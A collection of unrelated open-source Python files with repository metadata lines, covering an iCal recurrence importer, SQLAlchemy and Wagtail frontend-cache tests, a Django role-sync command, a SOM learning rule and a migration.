return None
def get_as_list(obj, attr):
v = obj.get(attr)
if v:
return v if isinstance(v, list) else [v]
return []
def to_utc(dt):
if timezone.is_aware(dt):
return timezone.make_naive(dt.astimezone(pytz.utc), pytz.utc)
else:
return pytz.utc.localize(dt)
rset = rruleset()
for rrule in get_as_list(ical_event, 'RRULE'):
rrule = rrulestr(rrule.to_ical(), dtstart=event.start)
rset.rrule(rrule)
for exrule in get_as_list(ical_event, 'EXRULE'):
exrule = rrulestr(exrule.to_ical(), dtstart=event.start)
rset.rrule(exrule)
for rdate in get_as_list(ical_event, 'RDATE'):
for dt in rdate.dts:
rset.rdate(to_utc(dt.dt))
for exdate in get_as_list(ical_event, 'EXDATE'):
for dt in exdate.dts:
rset.exdate(to_utc(dt.dt))
return from_dateutil_rruleset(rset)
| yvan-sraka/wprevents | wprevents/admin/event_importer.py | Python | bsd-3-clause | 8,479 |
import sqlalchemy as sa
from sqlalchemy_utils import get_query_entities
from tests import TestCase
class TestGetQueryEntities(TestCase):
def create_models(self):
class TextItem(self.Base):
__tablename__ = 'text_item'
id = sa.Column(sa.Integer, primary_key=True)
type = sa.Column(sa.Unicode(255))
__mapper_args__ = {
'polymorphic_on': type,
}
class Article(TextItem):
__tablename__ = 'article'
id = sa.Column(
sa.Integer, sa.ForeignKey(TextItem.id), primary_key=True
)
category = sa.Column(sa.Unicode(255))
__mapper_args__ = {
'polymorphic_identity': u'article'
}
class BlogPost(TextItem):
__tablename__ = 'blog_post'
id = sa.Column(
sa.Integer, sa.ForeignKey(TextItem.id), primary_key=True
)
__mapper_args__ = {
'polymorphic_identity': u'blog_post'
}
self.TextItem = TextItem
self.Article = Article
self.BlogPost = BlogPost
def test_mapper(self):
query = self.session.query(sa.inspect(self.TextItem))
assert list(get_query_entities(query)) == [self.TextItem]
def test_entity(self):
query = self.session.query(self.TextItem)
assert list(get_query_entities(query)) == [self.TextItem]
def test_instrumented_attribute(self):
query = self.session.query(self.TextItem.id)
assert list(get_query_entities(query)) == [self.TextItem]
def test_column(self):
query = self.session.query(self.TextItem.__table__.c.id)
assert list(get_query_entities(query)) == [self.TextItem.__table__]
def test_aliased_selectable(self):
selectable = sa.orm.with_polymorphic(self.TextItem, [self.BlogPost])
query = self.session.query(selectable)
assert list(get_query_entities(query)) == [selectable]
def test_joined_entity(self):
query = self.session.query(self.TextItem).join(
self.BlogPost, self.BlogPost.id == self.TextItem.id
)
assert list(get_query_entities(query)) == [
self.TextItem, self.BlogPost
]
def test_joined_aliased_entity(self):
alias = sa.orm.aliased(self.BlogPost)
query = self.session.query(self.TextItem).join(
alias, alias.id == self.TextItem.id
)
assert list(get_query_entities(query)) == [self.TextItem, alias]
def test_column_entity_with_label(self):
query = self.session.query(self.Article.id.label('id'))
assert list(get_query_entities(query)) == [sa.inspect(self.Article)]
def test_with_subquery(self):
number_of_articles = (
sa.select(
[sa.func.count(self.Article.id)],
)
.select_from(
self.Article.__table__
)
).label('number_of_articles')
query = self.session.query(self.Article, number_of_articles)
assert list(get_query_entities(query)) == [self.Article, number_of_articles]
def test_aliased_entity(self):
alias = sa.orm.aliased(self.Article)
query = self.session.query(alias)
assert list(get_query_entities(query)) == [alias]
| tonyseek/sqlalchemy-utils | tests/functions/test_get_query_entities.py | Python | bsd-3-clause | 3,353 |
# -*- coding: utf-8 -*-
#
# This file is part of Django appschema released under the MIT license.
# See the LICENSE for more information.
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from django.contrib.contenttypes.models import ContentType
from django.utils.importlib import import_module
import yaml
import os.path
from scholrroles.models import Role, Permission
class Command(BaseCommand):
help = 'Creates a new active schema'
option_list = BaseCommand.option_list + (
make_option('--file', action='store', dest='role_file',
default=None, help='Select a file with roles. '
'Defaults to the settings.ROLE_FILE.'),
)
def handle(self, *args, **options):
files, roles = self.get_roles_files(), []
for role_file in files:
stream = open(role_file, 'r')
data = yaml.load(stream)
roles.extend(data['roles'])
self.update_roles(roles)
files, perms = self.get_permission_files(), []
for perm_file in files:
stream = open(perm_file, 'r')
data = yaml.load(stream)
perms.extend(data['perms'])
self.update_perms(perms)
def get_roles_files(self):
files = []
for app in settings.INSTALLED_APPS:
module = import_module(app)
pth = os.path.abspath(module.__path__[0])
if os.path.isfile(pth + '/roles.yml'):
files.append(pth + '/roles.yml')
return files
def get_permission_files(self):
files = []
for app in settings.INSTALLED_APPS:
module = import_module(app)
pth = os.path.abspath(module.__path__[0])
if os.path.isfile(pth + '/permissions.yml'):
files.append(pth + '/permissions.yml')
return files
def update_roles(self, roles):
existing_roles = Role.objects.all().values_list('name', flat=True)
print """
--------------------
Create Roles
--------------------
"""
for role in roles:
if role not in existing_roles:
print role
Role.objects.create(name = role)
to_delete = [x for x in existing_roles if x not in roles]
if to_delete:
print """
--------------------
Delete Roles
--------------------
"""
for role in to_delete:
print role
Role.objects.filter(name__in = to_delete).delete()
def update_perms(self, perms):
existing_perms = Permission.objects.all()
dont_delete = []
for perm in perms:
existing_perm = existing_perms.filter(content_type=ContentType.objects.get_by_natural_key(perm['app_label'], perm['model']),
name = perm['name'], instance_perm = perm['instance_perm'])
if existing_perm:
self.update_perm_roles(perm, existing_perm[0])
dont_delete.append(existing_perm[0].pk)
else:
existing_perm = Permission.objects.create(content_type=ContentType.objects.get_by_natural_key(perm['app_label'], perm['model']),
name = perm['name'], instance_perm = perm['instance_perm'])
dont_delete.append(existing_perm.pk)
print u" Created Permission: ".format(existing_perm)
self.update_perm_roles(perm, existing_perm)
to_delete = Permission.objects.exclude(pk__in=dont_delete)
if to_delete:
print """
--------------------
Delete Permissions
--------------------
"""
for perm in to_delete:
print perm
to_delete.delete()
def update_perm_roles(self, perm, existing_perm):
if existing_perm.roles.filter(name__in=perm['roles']).count() < len(perm['roles']):
print " Adding roles to: {}".format(existing_perm)
for role in perm['roles']:
if not existing_perm.roles.filter(name=role).exists():
print " Adding role: {}".format(role)
existing_perm.roles.add(Role.objects.get(name=role))
to_delete = existing_perm.roles.exclude(name__in = perm['roles'])
for role in to_delete:
print u" Deleting role from: {}, {}".format(existing_perm,role)
existing_perm.roles.remove(role)
| Scholr/scholr-roles | scholrroles/management/commands/update_roles.py | Python | bsd-3-clause | 4,576 |
# encoding: utf-8
"""
__init__.py
Created by Thomas Mangin on 2010-01-15.
Copyright (c) 2009-2015 Exa Networks. All rights reserved.
"""
| fugitifduck/exabgp | lib/exabgp/__init__.py | Python | bsd-3-clause | 138 |
"""
SOM-based learning functions for CFProjections.
"""
from math import ceil
import param
from imagen import PatternGenerator, Gaussian
from holoviews import BoundingBox
from topo.base.arrayutil import L2norm, array_argmax
from topo.base.cf import CFPLearningFn
### JABHACKALERT: This class will be removed once the examples no
### longer rely upon it
class CFPLF_SOM(CFPLearningFn):
"""
An abstract base class of learning functions for Self-Organizing Maps.
This implementation is obsolete and will be removed soon.
Please see examples/cfsom_or.ty for current SOM support.
"""
__abstract = True
learning_radius = param.Number(default=0.0,doc=
"""
The radius of the neighborhood function to be used for
learning. Typically, this value will be set by the Sheet or
Projection owning this CFPLearningFn, but it can also be set
explicitly by the user.
""")
def __init__(self,**params):
self.warning("CFPLF_SOM is deprecated -- see the example in cfsom_or.ty for how to build a SOM")
def __call__(self, proj, input_activity, output_activity, learning_rate, **params):
raise NotImplementedError
### JABHACKALERT: This class will be removed once the examples no
### longer rely upon it
class CFPLF_HebbianSOM(CFPLF_SOM):
"""
Hebbian learning rule for CFProjections to Self-Organizing Maps.
This implementation is obsolete and will be removed soon.
Please see examples/cfsom_or.ty for current SOM support.
"""
learning_radius = param.Number(default=0.0)
crop_radius_multiplier = param.Number(default=3.0,doc=
"""
Factor by which the radius should be multiplied,
when deciding how far from the winner to keep updating the weights.
""")
neighborhood_kernel_generator = param.ClassSelector(PatternGenerator,
default=Gaussian(x=0.0,y=0.0,aspect_ratio=1.0),
doc="Neighborhood function")
def __call__(self, iterator, input_activity, output_activity, learning_rate, **params):
cfs = iterator.proj.cfs.tolist() # CEBALERT: convert to use flatcfs
rows,cols = output_activity.shape
# This learning function does not need to scale the learning
# rate like some do, so it does not use constant_sum_connection_rate()
single_connection_learning_rate = learning_rate
### JABALERT: The learning_radius is normally set by
### the learn() function of CFSOM, so it doesn't matter
### much that the value accepted here is in matrix and
### not sheet coordinates. It's confusing that anything
### would accept matrix coordinates, but the learning_fn
### doesn't have access to the sheet, so it can't easily
### convert from sheet coords.
radius = self.learning_radius
crop_radius = max(1.25,radius*self.crop_radius_multiplier)
# find out the matrix coordinates of the winner
#
# NOTE: when there are multiple projections, it would be
# slightly more efficient to calculate the winner coordinates
# within the Sheet, e.g. by moving winner_coords() to CFSOM
# and passing in the results here. However, finding the
# coordinates does not take much time, and requiring the
# winner to be passed in would make it harder to mix and match
# Projections and learning rules with different Sheets.
wr,wc = array_argmax(output_activity)
# Optimization: Calculate the bounding box around the winner
# in which weights will be changed, to avoid considering those
# units below.
cmin = int(max(wc-crop_radius,0))
cmax = int(min(wc+crop_radius+1,cols)) # at least 1 between cmin and cmax
rmin = int(max(wr-crop_radius,0))
rmax = int(min(wr+crop_radius+1,rows))
# generate the neighborhood kernel matrix so that the values
# can be read off easily using matrix coordinates.
nk_generator = self.neighborhood_kernel_generator
radius_int = int(ceil(crop_radius))
rbound = radius_int + 0.5
bb = BoundingBox(points=((-rbound,-rbound), (rbound,rbound)))
# Print parameters designed to match fm2d's output
#print "%d rad= %d std= %f alpha= %f" % (topo.sim._time, radius_int, radius, single_connection_learning_rate)
neighborhood_matrix = nk_generator(bounds=bb,xdensity=1,ydensity=1,
size=2*radius)
for r in range(rmin,rmax):
for c in range(cmin,cmax):
cwc = c - wc
rwr = r - wr
lattice_dist = L2norm((cwc,rwr))
if lattice_dist <= crop_radius:
cf = cfs[r][c]
rate = single_connection_learning_rate * neighborhood_matrix[rwr+radius_int,cwc+radius_int]
X = cf.get_input_matrix(input_activity)
cf.weights += rate * (X - cf.weights)
# CEBHACKALERT: see ConnectionField.__init__()
cf.weights *= cf.mask
| ioam/topographica | topo/learningfn/som.py | Python | bsd-3-clause | 5,130 |
from unittest import mock
from urllib.error import HTTPError, URLError
import requests
from azure.mgmt.cdn import CdnManagementClient
from azure.mgmt.frontdoor import FrontDoorManagementClient
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.test.utils import override_settings
from wagtail.contrib.frontend_cache.backends import (
AzureCdnBackend, AzureFrontDoorBackend, BaseBackend, CloudflareBackend, CloudfrontBackend,
HTTPBackend)
from wagtail.contrib.frontend_cache.utils import get_backends
from wagtail.core.models import Page
from wagtail.tests.testapp.models import EventIndex
from .utils import (
PurgeBatch, purge_page_from_cache, purge_pages_from_cache, purge_url_from_cache,
purge_urls_from_cache)
class TestBackendConfiguration(TestCase):
def test_default(self):
backends = get_backends()
self.assertEqual(len(backends), 0)
def test_varnish(self):
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000',
},
})
self.assertEqual(set(backends.keys()), set(['varnish']))
self.assertIsInstance(backends['varnish'], HTTPBackend)
self.assertEqual(backends['varnish'].cache_scheme, 'http')
self.assertEqual(backends['varnish'].cache_netloc, 'localhost:8000')
def test_cloudflare(self):
backends = get_backends(backend_settings={
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
'BEARER_TOKEN': 'this is a bearer token'
},
})
self.assertEqual(set(backends.keys()), set(['cloudflare']))
self.assertIsInstance(backends['cloudflare'], CloudflareBackend)
self.assertEqual(backends['cloudflare'].cloudflare_email, '[email protected]')
self.assertEqual(backends['cloudflare'].cloudflare_api_key, 'this is the api key')
self.assertEqual(backends['cloudflare'].cloudflare_token, 'this is a bearer token')
def test_cloudfront(self):
backends = get_backends(backend_settings={
'cloudfront': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudfrontBackend',
'DISTRIBUTION_ID': 'frontend',
},
})
self.assertEqual(set(backends.keys()), set(['cloudfront']))
self.assertIsInstance(backends['cloudfront'], CloudfrontBackend)
self.assertEqual(backends['cloudfront'].cloudfront_distribution_id, 'frontend')
def test_azure_cdn(self):
backends = get_backends(backend_settings={
'azure_cdn': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureCdnBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'CDN_PROFILE_NAME': 'wagtail-io-profile',
'CDN_ENDPOINT_NAME': 'wagtail-io-endpoint',
},
})
self.assertEqual(set(backends.keys()), set(['azure_cdn']))
self.assertIsInstance(backends['azure_cdn'], AzureCdnBackend)
self.assertEqual(backends['azure_cdn']._resource_group_name, 'test-resource-group')
self.assertEqual(backends['azure_cdn']._cdn_profile_name, 'wagtail-io-profile')
self.assertEqual(backends['azure_cdn']._cdn_endpoint_name, 'wagtail-io-endpoint')
def test_azure_front_door(self):
backends = get_backends(backend_settings={
'azure_front_door': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'FRONT_DOOR_NAME': 'wagtail-io-front-door',
},
})
self.assertEqual(set(backends.keys()), set(['azure_front_door']))
self.assertIsInstance(backends['azure_front_door'], AzureFrontDoorBackend)
self.assertEqual(backends['azure_front_door']._resource_group_name, 'test-resource-group')
self.assertEqual(backends['azure_front_door']._front_door_name, 'wagtail-io-front-door')
def test_azure_cdn_get_client(self):
mock_credentials = mock.MagicMock()
backends = get_backends(backend_settings={
'azure_cdn': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureCdnBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'CDN_PROFILE_NAME': 'wagtail-io-profile',
'CDN_ENDPOINT_NAME': 'wagtail-io-endpoint',
'SUBSCRIPTION_ID': 'fake-subscription-id',
'CREDENTIALS': mock_credentials,
},
})
self.assertEqual(set(backends.keys()), set(['azure_cdn']))
client = backends['azure_cdn']._get_client()
self.assertIsInstance(client, CdnManagementClient)
self.assertEqual(client.config.subscription_id, 'fake-subscription-id')
self.assertIs(client.config.credentials, mock_credentials)
def test_azure_front_door_get_client(self):
mock_credentials = mock.MagicMock()
backends = get_backends(backend_settings={
'azure_front_door': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'FRONT_DOOR_NAME': 'wagtail-io-fake-front-door-name',
'SUBSCRIPTION_ID': 'fake-subscription-id',
'CREDENTIALS': mock_credentials,
},
})
client = backends['azure_front_door']._get_client()
self.assertEqual(set(backends.keys()), set(['azure_front_door']))
self.assertIsInstance(client, FrontDoorManagementClient)
self.assertEqual(client.config.subscription_id, 'fake-subscription-id')
self.assertIs(client.config.credentials, mock_credentials)
@mock.patch('wagtail.contrib.frontend_cache.backends.AzureCdnBackend._make_purge_call')
def test_azure_cdn_purge(self, make_purge_call_mock):
backends = get_backends(backend_settings={
'azure_cdn': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureCdnBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'CDN_PROFILE_NAME': 'wagtail-io-profile',
'CDN_ENDPOINT_NAME': 'wagtail-io-endpoint',
'CREDENTIALS': 'Fake credentials',
},
})
self.assertEqual(set(backends.keys()), set(['azure_cdn']))
self.assertIsInstance(backends['azure_cdn'], AzureCdnBackend)
# purge()
backends['azure_cdn'].purge('http://www.wagtail.org/home/events/christmas/?test=1')
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertEqual(len(call_args), 2)
self.assertIsInstance(call_args[0], CdnManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1"])
make_purge_call_mock.reset_mock()
# purge_batch()
backends['azure_cdn'].purge_batch([
'http://www.wagtail.org/home/events/christmas/?test=1', 'http://torchbox.com/blog/'
])
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertIsInstance(call_args[0], CdnManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1", "/blog/"])
@mock.patch('wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend._make_purge_call')
def test_azure_front_door_purge(self, make_purge_call_mock):
backends = get_backends(backend_settings={
'azure_front_door': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.AzureFrontDoorBackend',
'RESOURCE_GROUP_NAME': 'test-resource-group',
'FRONT_DOOR_NAME': 'wagtail-io-front-door',
'CREDENTIALS': 'Fake credentials',
},
})
self.assertEqual(set(backends.keys()), set(['azure_front_door']))
self.assertIsInstance(backends['azure_front_door'], AzureFrontDoorBackend)
# purge()
backends['azure_front_door'].purge('http://www.wagtail.org/home/events/christmas/?test=1')
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertIsInstance(call_args[0], FrontDoorManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1"])
make_purge_call_mock.reset_mock()
# purge_batch()
backends['azure_front_door'].purge_batch([
'http://www.wagtail.org/home/events/christmas/?test=1', 'http://torchbox.com/blog/'
])
make_purge_call_mock.assert_called_once()
call_args = tuple(make_purge_call_mock.call_args)[0]
self.assertIsInstance(call_args[0], FrontDoorManagementClient)
self.assertEqual(call_args[1], ["/home/events/christmas/?test=1", "/blog/"])
def test_http(self):
"""Test that `HTTPBackend.purge` works when urlopen succeeds"""
self._test_http_with_side_effect(urlopen_side_effect=None)
def test_http_httperror(self):
"""Test that `HTTPBackend.purge` can handle `HTTPError`"""
http_error = HTTPError(
url='http://localhost:8000/home/events/christmas/',
code=500,
msg='Internal Server Error',
hdrs={},
fp=None
)
with self.assertLogs(level='ERROR') as log_output:
self._test_http_with_side_effect(urlopen_side_effect=http_error)
self.assertIn(
"Couldn't purge 'http://www.wagtail.org/home/events/christmas/' from HTTP cache. HTTPError: 500 Internal Server Error",
log_output.output[0]
)
def test_http_urlerror(self):
"""Test that `HTTPBackend.purge` can handle `URLError`"""
url_error = URLError(reason='just for tests')
with self.assertLogs(level='ERROR') as log_output:
self._test_http_with_side_effect(urlopen_side_effect=url_error)
self.assertIn(
"Couldn't purge 'http://www.wagtail.org/home/events/christmas/' from HTTP cache. URLError: just for tests",
log_output.output[0]
)
@mock.patch('wagtail.contrib.frontend_cache.backends.urlopen')
def _test_http_with_side_effect(self, urlopen_mock, urlopen_side_effect):
# given a backends configuration with one HTTP backend
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000',
},
})
self.assertEqual(set(backends.keys()), set(['varnish']))
self.assertIsInstance(backends['varnish'], HTTPBackend)
# and mocked urlopen that may or may not raise network-related exception
urlopen_mock.side_effect = urlopen_side_effect
# when making a purge request
backends.get('varnish').purge('http://www.wagtail.org/home/events/christmas/')
# then no exception is raised
# and mocked urlopen is called with a proper purge request
self.assertEqual(urlopen_mock.call_count, 1)
(purge_request,), _call_kwargs = urlopen_mock.call_args
self.assertEqual(purge_request.full_url, 'http://localhost:8000/home/events/christmas/')
def test_cloudfront_validate_distribution_id(self):
with self.assertRaises(ImproperlyConfigured):
get_backends(backend_settings={
'cloudfront': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudfrontBackend',
},
})
@mock.patch('wagtail.contrib.frontend_cache.backends.CloudfrontBackend._create_invalidation')
def test_cloudfront_distribution_id_mapping(self, _create_invalidation):
backends = get_backends(backend_settings={
'cloudfront': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudfrontBackend',
'DISTRIBUTION_ID': {
'www.wagtail.org': 'frontend',
}
},
})
backends.get('cloudfront').purge('http://www.wagtail.org/home/events/christmas/')
backends.get('cloudfront').purge('http://torchbox.com/blog/')
_create_invalidation.assert_called_once_with('frontend', ['/home/events/christmas/'])
def test_multiple(self):
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000/',
},
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
}
})
self.assertEqual(set(backends.keys()), set(['varnish', 'cloudflare']))
def test_filter(self):
backends = get_backends(backend_settings={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000/',
},
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
}
}, backends=['cloudflare'])
self.assertEqual(set(backends.keys()), set(['cloudflare']))
@override_settings(WAGTAILFRONTENDCACHE_LOCATION='http://localhost:8000')
def test_backwards_compatibility(self):
backends = get_backends()
self.assertEqual(set(backends.keys()), set(['default']))
self.assertIsInstance(backends['default'], HTTPBackend)
self.assertEqual(backends['default'].cache_scheme, 'http')
self.assertEqual(backends['default'].cache_netloc, 'localhost:8000')
PURGED_URLS = []
class MockBackend(BaseBackend):
def __init__(self, config):
pass
def purge(self, url):
PURGED_URLS.append(url)
class MockCloudflareBackend(CloudflareBackend):
def __init__(self, config):
pass
def _purge_urls(self, urls):
if len(urls) > self.CHUNK_SIZE:
raise Exception("Cloudflare backend is not chunking requests as expected")
PURGED_URLS.extend(urls)
@override_settings(WAGTAILFRONTENDCACHE={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.tests.MockBackend',
},
})
class TestCachePurgingFunctions(TestCase):
fixtures = ['test.json']
def setUp(self):
# Reset PURGED_URLS to an empty list
PURGED_URLS[:] = []
def test_purge_url_from_cache(self):
purge_url_from_cache('http://localhost/foo')
self.assertEqual(PURGED_URLS, ['http://localhost/foo'])
def test_purge_urls_from_cache(self):
purge_urls_from_cache(['http://localhost/foo', 'http://localhost/bar'])
self.assertEqual(PURGED_URLS, ['http://localhost/foo', 'http://localhost/bar'])
def test_purge_page_from_cache(self):
page = EventIndex.objects.get(url_path='/home/events/')
purge_page_from_cache(page)
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_pages_from_cache(self):
purge_pages_from_cache(EventIndex.objects.all())
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_batch(self):
batch = PurgeBatch()
page = EventIndex.objects.get(url_path='/home/events/')
batch.add_page(page)
batch.add_url('http://localhost/foo')
batch.purge()
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/', 'http://localhost/foo'])
@override_settings(WAGTAILFRONTENDCACHE={
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.tests.MockCloudflareBackend',
},
})
class TestCloudflareCachePurgingFunctions(TestCase):
def setUp(self):
# Reset PURGED_URLS to an empty list
PURGED_URLS[:] = []
def test_cloudflare_purge_batch_chunked(self):
batch = PurgeBatch()
urls = ['https://localhost/foo{}'.format(i) for i in range(1, 65)]
batch.add_urls(urls)
batch.purge()
self.assertCountEqual(PURGED_URLS, urls)
@override_settings(WAGTAILFRONTENDCACHE={
'varnish': {
'BACKEND': 'wagtail.contrib.frontend_cache.tests.MockBackend',
},
})
class TestCachePurgingSignals(TestCase):
fixtures = ['test.json']
def setUp(self):
# Reset PURGED_URLS to an empty list
PURGED_URLS[:] = []
def test_purge_on_publish(self):
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_on_unpublish(self):
page = EventIndex.objects.get(url_path='/home/events/')
page.unpublish()
self.assertEqual(PURGED_URLS, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_purge_with_unroutable_page(self):
root = Page.objects.get(url_path='/')
page = EventIndex(title='new top-level page')
root.add_child(instance=page)
page.save_revision().publish()
self.assertEqual(PURGED_URLS, [])
@override_settings(ROOT_URLCONF='wagtail.tests.urls_multilang',
LANGUAGE_CODE='en',
WAGTAILFRONTENDCACHE_LANGUAGES=['en', 'fr', 'pt-br'])
def test_purge_on_publish_in_multilang_env(self):
PURGED_URLS[:] = [] # reset PURGED_URLS to the empty list
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, [
'http://localhost/en/events/',
'http://localhost/en/events/past/',
'http://localhost/fr/events/',
'http://localhost/fr/events/past/',
'http://localhost/pt-br/events/',
'http://localhost/pt-br/events/past/',
])
@override_settings(ROOT_URLCONF='wagtail.tests.urls_multilang',
LANGUAGE_CODE='en',
WAGTAIL_I18N_ENABLED=True,
WAGTAIL_CONTENT_LANGUAGES=[('en', 'English'), ('fr', 'French')])
def test_purge_on_publish_with_i18n_enabled(self):
PURGED_URLS[:] = [] # reset PURGED_URLS to the empty list
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, [
'http://localhost/en/events/',
'http://localhost/en/events/past/',
'http://localhost/fr/events/',
'http://localhost/fr/events/past/',
])
@override_settings(ROOT_URLCONF='wagtail.tests.urls_multilang',
LANGUAGE_CODE='en',
WAGTAIL_CONTENT_LANGUAGES=[('en', 'English'), ('fr', 'French')])
def test_purge_on_publish_without_i18n_enabled(self):
# It should ignore WAGTAIL_CONTENT_LANGUAGES as WAGTAIL_I18N_ENABLED isn't set
PURGED_URLS[:] = [] # reset PURGED_URLS to the empty list
page = EventIndex.objects.get(url_path='/home/events/')
page.save_revision().publish()
self.assertEqual(PURGED_URLS, ['http://localhost/en/events/', 'http://localhost/en/events/past/'])
class TestPurgeBatchClass(TestCase):
# Tests the .add_*() methods on PurgeBatch. The .purge() method is tested
# by TestCachePurgingFunctions.test_purge_batch above
fixtures = ['test.json']
def test_add_url(self):
batch = PurgeBatch()
batch.add_url('http://localhost/foo')
self.assertEqual(batch.urls, ['http://localhost/foo'])
def test_add_urls(self):
batch = PurgeBatch()
batch.add_urls(['http://localhost/foo', 'http://localhost/bar'])
self.assertEqual(batch.urls, ['http://localhost/foo', 'http://localhost/bar'])
def test_add_page(self):
page = EventIndex.objects.get(url_path='/home/events/')
batch = PurgeBatch()
batch.add_page(page)
self.assertEqual(batch.urls, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_add_pages(self):
batch = PurgeBatch()
batch.add_pages(EventIndex.objects.all())
self.assertEqual(batch.urls, ['http://localhost/events/', 'http://localhost/events/past/'])
def test_multiple_calls(self):
page = EventIndex.objects.get(url_path='/home/events/')
batch = PurgeBatch()
batch.add_page(page)
batch.add_url('http://localhost/foo')
batch.purge()
self.assertEqual(batch.urls, ['http://localhost/events/', 'http://localhost/events/past/', 'http://localhost/foo'])
@mock.patch('wagtail.contrib.frontend_cache.backends.requests.delete')
def test_http_error_on_cloudflare_purge_batch(self, requests_delete_mock):
backend_settings = {
'cloudflare': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.CloudflareBackend',
'EMAIL': '[email protected]',
'API_KEY': 'this is the api key',
'ZONEID': 'this is a zone id',
},
}
class MockResponse:
def __init__(self, status_code=200):
self.status_code = status_code
http_error = requests.exceptions.HTTPError(response=MockResponse(status_code=500))
requests_delete_mock.side_effect = http_error
page = EventIndex.objects.get(url_path='/home/events/')
batch = PurgeBatch()
batch.add_page(page)
with self.assertLogs(level='ERROR') as log_output:
batch.purge(backend_settings=backend_settings)
self.assertIn(
"Couldn't purge 'http://localhost/events/' from Cloudflare. HTTPError: 500",
log_output.output[0]
)
| jnns/wagtail | wagtail/contrib/frontend_cache/tests.py | Python | bsd-3-clause | 22,580 |
"""Some system-specific info for cyclus."""
import sys
import importlib
from cyclus.lazyasd import lazyobject
@lazyobject
def PY_VERSION_TUPLE():
return sys.version_info[:3]
@lazyobject
def curio():
if PY_VERSION_TUPLE < (3, 5, 2):
return None
else:
try:
return importlib.import_module('curio')
except ImportError:
return None
@lazyobject
def asyncio():
if PY_VERSION_TUPLE < (3, 5, 0):
return None
else:
try:
return importlib.import_module('asyncio')
except ImportError:
return None
@lazyobject
def websockets():
if PY_VERSION_TUPLE < (3, 5, 0):
return None
else:
try:
return importlib.import_module('websockets')
except ImportError:
return None
@lazyobject
def concurrent_futures():
if PY_VERSION_TUPLE < (3, 2, 0):
return None
else:
try:
import concurrent.futures as m
return m
except ImportError:
return None
| hodger/cyclus | cyclus/system.py | Python | bsd-3-clause | 1,065 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0012_auto_20160204_1503'),
]
operations = [
migrations.AlterModelOptions(
name='eventassignment',
options={'permissions': (('can_be_assigned', 'Can be assigned to events'),)},
),
migrations.AlterField(
model_name='suggestedevent',
name='status',
field=models.CharField(default=b'created', max_length=40, choices=[(b'created', b'Created'), (b'submitted', b'Submitted'), (b'resubmitted', b'Resubmitted'), (b'rejected', b'Bounced back'), (b'retracted', b'Retracted'), (b'accepted', b'Accepted'), (b'removed', b'Removed')]),
preserve_default=True,
),
migrations.AlterField(
model_name='template',
name='content',
field=models.TextField(help_text=b"The HTML framework for this template. Use <code>{{ any_variable_name }}</code> for per-event tags. Other Jinja2 constructs are available, along with the related <code>request</code>, <code>datetime</code>, <code>event</code> objects, and the <code>md5</code> function. You can also reference <code>autoplay</code> and it's always safe. Additionally we have <code>vidly_tokenize(tag, seconds)</code>, <code>edgecast_tokenize([seconds], **kwargs)</code> and <code>akamai_tokenize([seconds], **kwargs)</code><br> Warning! Changes affect all events associated with this template."),
preserve_default=True,
),
]
